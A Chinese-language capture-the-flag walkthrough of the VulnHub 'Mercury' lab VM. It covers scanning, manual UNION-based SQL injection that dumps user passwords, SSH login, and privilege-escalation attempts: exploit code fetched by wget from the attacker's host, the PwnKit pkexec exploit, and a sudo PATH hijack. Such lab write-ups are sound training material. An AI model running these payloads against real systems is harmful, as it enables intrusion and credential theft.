The Planets: Mercury
作者:jason_huawen
靶机基本信息
名称:The Planets: Mercury
地址:
https://www.vulnhub.com/entry/the-planets-mercury,544/
识别目标主机IP地址
──(kali㉿kali)-[~/Vulnhub/Mercury]
└─$ sudo netdiscover -i eth1Currently scanning: 192.168.76.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:9e:f5:5c 1 60 PCS Systemtechnik GmbH
192.168.56.226 08:00:27:ff:54:84 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.226
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/Mercury]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.226 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-26 23:03 EST
Nmap scan report for localhost (192.168.56.226)
Host is up (0.00010s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 c8:24:ea:2a:2b:f1:3c:fa:16:94:65:bd:c7:9b:6c:29 (RSA)
| 256 e8:08:a1:8e:7d:5a:bc:5c:66:16:48:24:57:0d:fa:b8 (ECDSA)
|_ 256 2f:18:7e:10:54:f7:b9:17:a2:11:1d:8f:b3:30:a5:2a (ED25519)
8080/tcp open http-proxy WSGIServer/0.2 CPython/3.8.2
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.1 404 Not Found
| Date: Sun, 27 Nov 2022 04:03:14 GMT
| Server: WSGIServer/0.2 CPython/3.8.2
| Content-Type: text/html
| X-Frame-Options: DENY
| Content-Length: 2366
| X-Content-Type-Options: nosniff
| Referrer-Policy: same-origin
| <!DOCTYPE html>
| <html lang="en">
| <head>
| <meta http-equiv="content-type" content="text/html; charset=utf-8">
| <title>Page not found at /nice ports,/Trinity.txt.bak</title>
| <meta name="robots" content="NONE,NOARCHIVE">
| <style type="text/css">
| html * { padding:0; margin:0; }
| body * { padding:10px 20px; }
| body * * { padding:0; }
| body { font:small sans-serif; background:#eee; color:#000; }
| body>div { border-bottom:1px solid #ddd; }
| font-weight:normal; margin-bottom:.4em; }
| span { font-size:60%; color:#666; font-weight:normal; }
| table { border:none; border-collapse: collapse; width:100%; }
| vertical-align:
| GetRequest, HTTPOptions:
| HTTP/1.1 200 OK
| Date: Sun, 27 Nov 2022 04:03:14 GMT
| Server: WSGIServer/0.2 CPython/3.8.2
| Content-Type: text/html; charset=utf-8
| X-Frame-Options: DENY
| Content-Length: 69
| X-Content-Type-Options: nosniff
| Referrer-Policy: same-origin
| Hello. This site is currently in development please check back later.
| RTSPRequest:
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
| "http://www.w3.org/TR/html4/strict.dtd">
| <html>
| <head>
| <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
| <title>Error response</title>
| </head>
| <body>
| <h1>Error response</h1>
| <p>Error code: 400</p>
| <p>Message: Bad request version ('RTSP/1.0').</p>
| <p>Error code explanation: HTTPStatus.BAD_REQUEST - Bad request syntax or unsupported method.</p>
| </body>
|_ </html>
| http-robots.txt: 1 disallowed entry
|_/
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
|_http-server-header: WSGIServer/0.2 CPython/3.8.2
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8080-TCP:V=7.92%I=7%D=11/26%Time=6382E184%P=x86_64-pc-linux-gnu%r(G
SF:etRequest,135,"HTTP/1\.1\x20200\x20OK\r\nDate:\x20Sun,\x2027\x20Nov\x20
SF:2022\x2004:03:14\x20GMT\r\nServer:\x20WSGIServer/0\.2\x20CPython/3\.8\.
SF:2\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nX-Frame-Options:\x
SF:20DENY\r\nContent-Length:\x2069\r\nX-Content-Type-Options:\x20nosniff\r
SF:\nReferrer-Policy:\x20same-origin\r\n\r\nHello\.\x20This\x20site\x20is\
SF:x20currently\x20in\x20development\x20please\x20check\x20back\x20later\.
SF:")%r(HTTPOptions,135,"HTTP/1\.1\x20200\x20OK\r\nDate:\x20Sun,\x2027\x20
SF:Nov\x202022\x2004:03:14\x20GMT\r\nServer:\x20WSGIServer/0\.2\x20CPython
SF:/3\.8\.2\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nX-Frame-Opt
SF:ions:\x20DENY\r\nContent-Length:\x2069\r\nX-Content-Type-Options:\x20no
SF:sniff\r\nReferrer-Policy:\x20same-origin\r\n\r\nHello\.\x20This\x20site
SF:\x20is\x20currently\x20in\x20development\x20please\x20check\x20back\x20
SF:later\.")%r(RTSPRequest,1F4,"<!DOCTYPE\x20HTML\x20PUBLIC\x20\"-//W3C//D
SF:TD\x20HTML\x204\.01//EN\"\n\x20\x20\x20\x20\x20\x20\x20\x20\"http://www
SF:\.w3\.org/TR/html4/strict\.dtd\">\n<html>\n\x20\x20\x20\x20<head>\n\x20
SF:\x20\x20\x20\x20\x20\x20\x20<meta\x20http-equiv=\"Content-Type\"\x20con
SF:tent=\"text/html;charset=utf-8\">\n\x20\x20\x20\x20\x20\x20\x20\x20<tit
SF:le>Error\x20response</title>\n\x20\x20\x20\x20</head>\n\x20\x20\x20\x20
SF:<body>\n\x20\x20\x20\x20\x20\x20\x20\x20<h1>Error\x20response</h1>\n\x2
SF:0\x20\x20\x20\x20\x20\x20\x20<p>Error\x20code:\x20400</p>\n\x20\x20\x20
SF:\x20\x20\x20\x20\x20<p>Message:\x20Bad\x20request\x20version\x20\('RTSP
SF:/1\.0'\)\.</p>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Error\x20code\x20exp
SF:lanation:\x20HTTPStatus\.BAD_REQUEST\x20-\x20Bad\x20request\x20syntax\x
SF:20or\x20unsupported\x20method\.</p>\n\x20\x20\x20\x20</body>\n</html>\n
SF:")%r(FourOhFourRequest,A28,"HTTP/1\.1\x20404\x20Not\x20Found\r\nDate:\x
SF:20Sun,\x2027\x20Nov\x202022\x2004:03:14\x20GMT\r\nServer:\x20WSGIServer
SF:/0\.2\x20CPython/3\.8\.2\r\nContent-Type:\x20text/html\r\nX-Frame-Optio
SF:ns:\x20DENY\r\nContent-Length:\x202366\r\nX-Content-Type-Options:\x20no
SF:sniff\r\nReferrer-Policy:\x20same-origin\r\n\r\n<!DOCTYPE\x20html>\n<ht
SF:ml\x20lang=\"en\">\n<head>\n\x20\x20<meta\x20http-equiv=\"content-type\
SF:"\x20content=\"text/html;\x20charset=utf-8\">\n\x20\x20<title>Page\x20n
SF:ot\x20found\x20at\x20/nice\x20ports,/Trinity\.txt\.bak</title>\n\x20\x2
SF:0<meta\x20name=\"robots\"\x20content=\"NONE,NOARCHIVE\">\n\x20\x20<styl
SF:e\x20type=\"text/css\">\n\x20\x20\x20\x20html\x20\*\x20{\x20padding:0;\
SF:x20margin:0;\x20}\n\x20\x20\x20\x20body\x20\*\x20{\x20padding:10px\x202
SF:0px;\x20}\n\x20\x20\x20\x20body\x20\*\x20\*\x20{\x20padding:0;\x20}\n\x
SF:20\x20\x20\x20body\x20{\x20font:small\x20sans-serif;\x20background:#eee
SF:;\x20color:#000;\x20}\n\x20\x20\x20\x20body>div\x20{\x20border-bottom:1
SF:px\x20solid\x20#ddd;\x20}\n\x20\x20\x20\x20h1\x20{\x20font-weight:norma
SF:l;\x20margin-bottom:\.4em;\x20}\n\x20\x20\x20\x20h1\x20span\x20{\x20fon
SF:t-size:60%;\x20color:#666;\x20font-weight:normal;\x20}\n\x20\x20\x20\x2
SF:0table\x20{\x20border:none;\x20border-collapse:\x20collapse;\x20width:1
SF:00%;\x20}\n\x20\x20\x20\x20td,\x20th\x20{\x20vertical-align:");
MAC Address: 08:00:27:FF:54:84 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 94.61 seconds
NMAP扫描结果表明目标主机有2个开放端口:22(SSH)、8080(HTTP)
Get Access
┌──(kali㉿kali)-[~/Vulnhub/Mercury]
└─$ curl http://192.168.56.226:8080/
Hello. This site is currently in development please check back later.
┌──(kali㉿kali)-[~/Vulnhub/Mercury]
└─$ curl http://192.168.56.226:8080/robots.txt
User-agent: *
Disallow: /
┌──(kali㉿kali)-[~/Vulnhub/Mercury]
└─$ nikto -h http://192.168.56.226:8080
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.226
+ Target Hostname: 192.168.56.226
+ Target Port: 8080
+ Start Time: 2022-11-26 23:17:00 (GMT-5)
---------------------------------------------------------------------------
+ Server: WSGIServer/0.2 CPython/3.8.2
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-17113: /SilverStream: SilverStream allows directory listing
+ Server banner has changed from 'WSGIServer/0.2 CPython/3.8.2' to 'WSGIServer/0.2 Python/3.8.2' which may suggest a WAF, load balancer or proxy is in place
+ 7928 requests: 0 error(s) and 2 item(s) reported on remote host
+ End Time: 2022-11-26 23:17:52 (GMT-5) (52 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (WSGIServer/0.2) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to [email protected]) (y/n)?
Nikto工具识别出来/SilverStream目录:
┌──(kali㉿kali)-[~/Vulnhub/Mercury]
└─$ curl http://192.168.56.226:8080/SilverStream/
<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<title>Page not found at /SilverStream/</title>
<meta name="robots" content="NONE,NOARCHIVE">
<style type="text/css">
html * { padding:0; margin:0; }
body * { padding:10px 20px; }
body * * { padding:0; }
body { font:small sans-serif; background:#eee; color:#000; }
body>div { border-bottom:1px solid #ddd; }
h1 { font-weight:normal; margin-bottom:.4em; }
h1 span { font-size:60%; color:#666; font-weight:normal; }
table { border:none; border-collapse: collapse; width:100%; }
td, th { vertical-align:top; padding:2px 3px; }
th { width:12em; text-align:right; color:#666; padding-right:.5em; }
#info { background:#f6f6f6; }
#info ol { margin: 0.5em 4em; }
#info ol li { font-family: monospace; }
#summary { background: #ffc; }
#explanation { background:#eee; border-bottom: 0px none; }
</style>
</head>
<body>
<div id="summary">
<h1>Page not found <span>(404)</span></h1>
<table class="meta">
<tr>
<th>Request Method:</th>
<td>GET</td>
</tr>
<tr>
<th>Request URL:</th>
<td>http://192.168.56.226:8080/SilverStream/</td>
</tr>
</table>
</div>
<div id="info">
<p>
Using the URLconf defined in <code>mercury_proj.urls</code>,
Django tried these URL patterns, in this order:
</p>
<ol>
<li>
[name='index']
</li>
<li>
robots.txt
[name='robots']
</li>
<li>
mercuryfacts/
</li>
</ol>
<p>
The current path, <code>SilverStream/</code>, didn't match any of these.
</p>
</div>
<div id="explanation">
<p>
You're seeing this error because you have <code>DEBUG = True</code> in
your Django settings file. Change that to <code>False</code>, and Django
will display a standard 404 page.
</p>
</div>
</body>
</html>
虽然返回404页面,但是返回的了一些debug信息,并且从中可以知道有个目录:mercuryfacts
访问该目录:
┌──(kali㉿kali)-[~/Vulnhub/Mercury]
└─$ curl http://192.168.56.226:8080/mercuryfacts/
<html>
<head>
<title> Mercury Facts </title>
</head>
<body>
<img src="/static/mercury_facts/mercury_1.jpg" alt="Picture of Mercury" width="400" height="400">
<br />
Still in development.
<ul>
<li> Mercury Facts: <a href='/mercuryfacts/1'> Load a fact. </a> </li>
<li> Website Todo List: <a href='/mercuryfacts/todo'> See list. </a> </li>
</ul>
</body>
</html>
──(kali㉿kali)-[~/Vulnhub/Mercury]
└─$ curl http://192.168.56.226:8080/mercuryfacts/todo
<html>
<head>
<title> Mercury Facts Todo </title>
</head>
<body>
Still todo:
<ul>
<li> Add CSS. </li>
<li> Implement authentication (using users table)</li>
<li> Use models in django instead of direct mysql call</li>
<li> All the other stuff, so much!!! </li>
</ul>
</body>
</html>
从这里作者给的提示看,目前与数据库交互是直接与mysql进行,而不是通过django,因此可能存在SQL注入漏洞。
其中/mercuryfacts/1,输入不同的数字,会返回不同的信息,会不会有SQL注入漏洞
http://192.168.56.226:8080/mercuryfacts/1 order by 1/
Fact id: 1 order by 1. (('Mercury does not have any moons or rings.',),)
只有1列
http://192.168.56.226:8080/mercuryfacts/1 and 1%3D2 union select database()/
Fact id: 1 and 1=2 union select database(). (('mercury',),)
数据库名称为Mercury
Fact id: 1 and 1=2 union select table_name from information_schema.tables where table_schema=database() limit 0,1. (('facts',),)
第1个表的名称是facts
act id: 1 and 1=2 union select table_name from information_schema.tables where table_schema=database() limit 1,1. (('users',),)
第2个表的名称是users
接下来要得到users表的字段名称
Fact id: 1 and 1=2 union select column_name from
information_schema.columns where table_schema=database() and
table_name='users' limit 0,1. (('id',),)
第1个字段是id
Fact id: 1 and 1=2 union select column_name from
information_schema.columns where table_schema=database() and
table_name='users' limit 1,1. (('password',),)
第2个字段是password
Fact id: 1 and 1=2 union select column_name from
information_schema.columns where table_schema=database() and
table_name='users' limit 2,1. (('username',),)
第3个字段是username
接下来把表中的数据dump出来:
Fact id: 1 and 1=2 union select concat(username,0x7e,password) from users limit 0,1. (('john~johnny1987',),)
Fact id: 1 and 1=2 union select concat(username,0x7e,password) from users limit 1,1. (('laura~lovemykids111',),)
Fact id: 1 and 1=2 union select concat(username,0x7e,password) from users limit 2,1. (('sam~lovemybeer111',),)
Fact id: 1 and 1=2 union select concat(username,0x7e,password) from
users limit 3,1. (('webmaster~mercuryisthesizeof0.056Earths',),)
至此利用SQL手工注入的方法,得到了所有的用户名和密码:
┌──(kali㉿kali)-[~/Vulnhub/Mercury]
└─$ cat username_and_password
webmaster mercuryisthesizeof0.056Earths
sam lovemybeer111
laura lovemykids111
john johnny1987
那么这些用户名和密码,到目前没有并没有看到8080端口的用户登录页面,那会不会是SSH服务的,试一试:
尝试了所有的用户名及相应的密码,发现只有webmaster用户可以成功登录:
┌──(kali㉿kali)-[~/Vulnhub/Mercury]
└─$ ls
nmap_full_scan username_and_password
┌──(kali㉿kali)-[~/Vulnhub/Mercury]
└─$ cat username_and_password
webmaster mercuryisthesizeof0.056Earths
sam lovemybeer111
laura lovemykids111
john johnny1987
┌──(kali㉿kali)-[~/Vulnhub/Mercury]
└─$ ssh [email protected]
The authenticity of host '192.168.56.226 (192.168.56.226)' can't be established.
ED25519 key fingerprint is SHA256:mHhkDLhyH54cYFlptygnwr7NYpEtepsNhVAT8qzqcUk.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.226' (ED25519) to the list of known hosts.
[email protected]'s password:
Permission denied, please try again.
[email protected]'s password:
┌──(kali㉿kali)-[~/Vulnhub/Mercury]
└─$ ssh [email protected]
[email protected]'s password:
Permission denied, please try again.
[email protected]'s password:
┌──(kali㉿kali)-[~/Vulnhub/Mercury]
└─$ ssh [email protected]
[email protected]'s password:
Permission denied, please try again.
[email protected]'s password:
┌──(kali㉿kali)-[~/Vulnhub/Mercury]
└─$ ssh [email protected]
[email protected]'s password:
Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-45-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information disabled due to load higher than 1.0
22 updates can be installed immediately.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Tue Sep 1 13:57:14 2020 from 192.168.31.136
webmaster@mercury:~$
webmaster@mercury:~$ cat user_flag.txt
[user_flag_8339915c9a454657bd60ee58776f4ccd]
webmaster@mercury:~$ cd mercury_proj/
webmaster@mercury:~/mercury_proj$ ls -alh
total 28K
drwxrwxr-x 5 webmaster webmaster 4.0K Aug 28 2020 .
drwx------ 4 webmaster webmaster 4.0K Sep 2 2020 ..
-rw-r--r-- 1 webmaster webmaster 0 Aug 27 2020 db.sqlite3
-rwxr-xr-x 1 webmaster webmaster 668 Aug 27 2020 manage.py
drwxrwxr-x 6 webmaster webmaster 4.0K Sep 1 2020 mercury_facts
drwxrwxr-x 4 webmaster webmaster 4.0K Aug 28 2020 mercury_index
drwxrwxr-x 3 webmaster webmaster 4.0K Aug 28 2020 mercury_proj
-rw------- 1 webmaster webmaster 196 Aug 28 2020 notes.txt
webmaster@mercury:~/mercury_proj$ cat notes.txt
Project accounts (both restricted):
webmaster for web stuff - webmaster:bWVyY3VyeWlzdGhlc2l6ZW9mMC4wNTZFYXJ0aHMK
linuxmaster for linux stuff - linuxmaster:bWVyY3VyeW1lYW5kaWFtZXRlcmlzNDg4MGttCg==
webmaster@mercury:~/mercury_proj$ cd mercury_facts/
webmaster@mercury:~/mercury_proj/mercury_facts$ ls -alh
total 48K
drwxrwxr-x 6 webmaster webmaster 4.0K Sep 1 2020 .
drwxrwxr-x 5 webmaster webmaster 4.0K Aug 28 2020 ..
-rw-r--r-- 1 webmaster webmaster 63 Aug 27 2020 admin.py
-rw-r--r-- 1 webmaster webmaster 100 Aug 27 2020 apps.py
-rw-r--r-- 1 webmaster webmaster 0 Aug 27 2020 __init__.py
drwxrwxr-x 3 webmaster webmaster 4.0K Aug 28 2020 migrations
-rw-r--r-- 1 webmaster webmaster 57 Aug 27 2020 models.py
drwxrwxr-x 2 webmaster webmaster 4.0K Aug 28 2020 __pycache__
drwxrwxr-x 3 webmaster webmaster 4.0K Sep 1 2020 static
drwxrwxr-x 3 webmaster webmaster 4.0K Aug 28 2020 templates
-rw-r--r-- 1 webmaster webmaster 60 Aug 27 2020 tests.py
-rw-rw-r-- 1 webmaster webmaster 369 Aug 28 2020 urls.py
-rw-r--r-- 1 webmaster webmaster 637 Aug 28 2020 views.py
webmaster@mercury:~/mercury_proj/mercury_facts$ cd ..
webmaster@mercury:~/mercury_proj$ ls -alh
total 28K
drwxrwxr-x 5 webmaster webmaster 4.0K Aug 28 2020 .
drwx------ 4 webmaster webmaster 4.0K Sep 2 2020 ..
-rw-r--r-- 1 webmaster webmaster 0 Aug 27 2020 db.sqlite3
-rwxr-xr-x 1 webmaster webmaster 668 Aug 27 2020 manage.py
drwxrwxr-x 6 webmaster webmaster 4.0K Sep 1 2020 mercury_facts
drwxrwxr-x 4 webmaster webmaster 4.0K Aug 28 2020 mercury_index
drwxrwxr-x 3 webmaster webmaster 4.0K Aug 28 2020 mercury_proj
-rw------- 1 webmaster webmaster 196 Aug 28 2020 notes.txt
webmaster@mercury:~/mercury_proj$
notes.txt文件中有base64编码后的密码,解码后即可,然后切换至linuxmaster用户
┌──(kali㉿kali)-[~/Vulnhub/Mercury]
└─$ echo "bWVyY3VyeW1lYW5kaWFtZXRlcmlzNDg4MGttCg==" |base64 -d
mercurymeandiameteris4880km
┌──(kali㉿kali)-[~/Vulnhub/Mercury]
└─$
linuxmaster@mercury:/home$ sudo -l
Matching Defaults entries for linuxmaster on mercury:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User linuxmaster may run the following commands on mercury:
(root : root) SETENV: /usr/bin/check_syslog.sh
提权
linuxmaster@mercury:/home$ find / -perm -4000 -type f 2>/dev/null
/usr/bin/sudo
/usr/bin/gpasswd
/usr/bin/su
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/mount
/usr/bin/chfn
/usr/bin/at
/usr/bin/pkexec
/usr/bin/umount
/usr/bin/fusermount
/usr/bin/passwd
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
利用最后一个命令进行提权
https://www.exploit-db.com/exploits/17932
linuxmaster@mercury:/tmp$ wget http://192.168.56.206:8000/17932.c
--2022-11-27 05:23:26-- http://192.168.56.206:8000/17932.c
Connecting to 192.168.56.206:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3492 (3.4K) [text/x-csrc]
Saving to: ‘17932.c’
17932.c 100%[====================================================>] 3.41K --.-KB/s in 0s
2022-11-27 05:23:26 (715 MB/s) - ‘17932.c’ saved [3492/3492]
linuxmaster@mercury:/tmp$ ls
17932.c
linpeas.sh
systemd-private-03a2003400454137ae070720e9620284-systemd-logind.service-BZzHpg
systemd-private-03a2003400454137ae070720e9620284-systemd-resolved.service-EzwFLg
systemd-private-03a2003400454137ae070720e9620284-systemd-timesyncd.service-CmPcsi
tmux-1002
linuxmaster@mercury:/tmp$ gcc 17932.c -o exploit
linuxmaster@mercury:/tmp$ ls
17932.c systemd-private-03a2003400454137ae070720e9620284-systemd-logind.service-BZzHpg tmux-1002
exploit systemd-private-03a2003400454137ae070720e9620284-systemd-resolved.service-EzwFLg
linpeas.sh systemd-private-03a2003400454137ae070720e9620284-systemd-timesyncd.service-CmPcsi
linuxmaster@mercury:/tmp$ chmod +x exploit
linuxmaster@mercury:/tmp$ ./exploit
=============================
= PolicyKit Pwnage =
= by zx2c4 =
= Sept 2, 2011 =
=============================
[+] Configuring inotify for proper pid.
[+] Launching pkexec.
linuxmaster@mercury:/tmp$
提权失败,看来这个漏洞利用代码有问题.
换个漏洞利用代码:
──(kali㉿kali)-[~/Vulnhub/Mercury]
└─$ ls
17932.c CVE-2021-4034-main cve.tar.gz nmap_full_scan
cve-2021-4034.c CVE-2021-4034-main.zip linpeas.sh username_and_password
由于目标主机没有zip命令,因此用tar打包上传至目标主机
linuxmaster@mercury:/tmp$ ls
17932.c cve.tar.gz systemd-private-03a2003400454137ae070720e9620284-systemd-logind.service-BZzHpg
cve-2021-4034.c exploit systemd-private-03a2003400454137ae070720e9620284-systemd-resolved.service-EzwFLg
CVE-2021-4034-main exploit2 systemd-private-03a2003400454137ae070720e9620284-systemd-timesyncd.service-CmPcsi
CVE-2021-4034-main.zip linpeas.sh tmux-1002
linuxmaster@mercury:/tmp$ cd CVE-2021-4034-main/
linuxmaster@mercury:/tmp/CVE-2021-4034-main$ ls
cve-2021-4034.sh dry-run LICENSE Makefile pwnkit.c README.md
linuxmaster@mercury:/tmp/CVE-2021-4034-main$ make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cat cve-2021-4034.sh >cve-2021-4034
chmod a+x cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp -f /usr/bin/true GCONV_PATH=./pwnkit.so:.
linuxmaster@mercury:/tmp/CVE-2021-4034-main$ ls
cve-2021-4034 dry-run 'GCONV_PATH=.' Makefile pwnkit.so
cve-2021-4034.sh gconv-modules LICENSE pwnkit.c README.md
linuxmaster@mercury:/tmp/CVE-2021-4034-main$ ./cve-2021-4034
make: *** No targets. Stop.
执行程序,并没有成功。所以这条路径是有问题的,而sudo -l给出的命令才是努力获得提权的方向:
linuxmaster@mercury:~$ cat /usr/bin/check_syslog.sh
#!/bin/bash
tail -n 10 /var/log/syslog
注意这里tail命令并不是绝对路径,因此从tail命令下手,遗憾的时候这个check_syslog.sh只有可读权限,需要用一个别的办法提权:
vice-CmPcsi
lrwxrwxrwx 1 linuxmaster linuxmaster 12 Nov 27 05:47 tail -> /usr/bin/vim
drwxrwxrwt 2 root root 4.0K Nov 27 04:00 .Test-unix
drwx------ 2 linuxmaster linuxmaster 4.0K Nov 27 05:16 tmux-1002
drwxrwxrwt 2 root root 4.0K Nov 27 04:00 .X11-unix
drwxrwxrwt 2 root root 4.0K Nov 27 04:00 .XIM-unix
linuxmaster@mercury:/tmp$ ln -s /usr/bin/vim tail
linuxmaster@mercury:/tmp$ export PATH=$(pwd):$PATH
linuxmaster@mercury:/tmp$ sudo --preserve-env=PATH /usr/bin/check_syslog.sh
Nov 27 05:30:11 mercury systemd-timesyncd[470]: Network configuration changed, trying to establish connection.
Nov 27 05:34:27 mercury kernel: [ 5651.595118] cgroup: fork rejected by pids controller in /user.slice/user-1001.slice/session-2.scope
Nov 27 05:35:09 mercury systemd-networkd[358]: enp0s3: DHCP: No gateway received from DHCP server.
Nov 27 05:35:09 mercury systemd-timesyncd[470]: Network configuration changed, trying to establish connection.
Nov 27 05:40:09 mercury systemd-networkd[358]: enp0s3: DHCP: No gateway received from DHCP server.
Nov 27 05:40:09 mercury systemd-timesyncd[470]: Network configuration changed, trying to establish connection.
Nov 27 05:45:09 mercury systemd-networkd[358]: enp0s3: DHCP: No gateway received from DHCP server.
Nov 27 05:45:09 mercury systemd-timesyncd[470]: Network configuration changed, trying to establish connection.
Nov 27 05:50:08 mercury systemd-networkd[358]: enp0s3: DHCP: No gateway received from DHCP server.
Nov 27 05:50:08 mercury systemd-timesyncd[470]: Network configuration changed, trying to establish connection.
linuxmaster@mercury:/tmp$
但是没有提权成功
标签:Mercury,mercury,192.168,x20,Vulnhub,Planets,SF,56.226,webmaster From: https://www.cnblogs.com/jason-huawen/p/16929576.html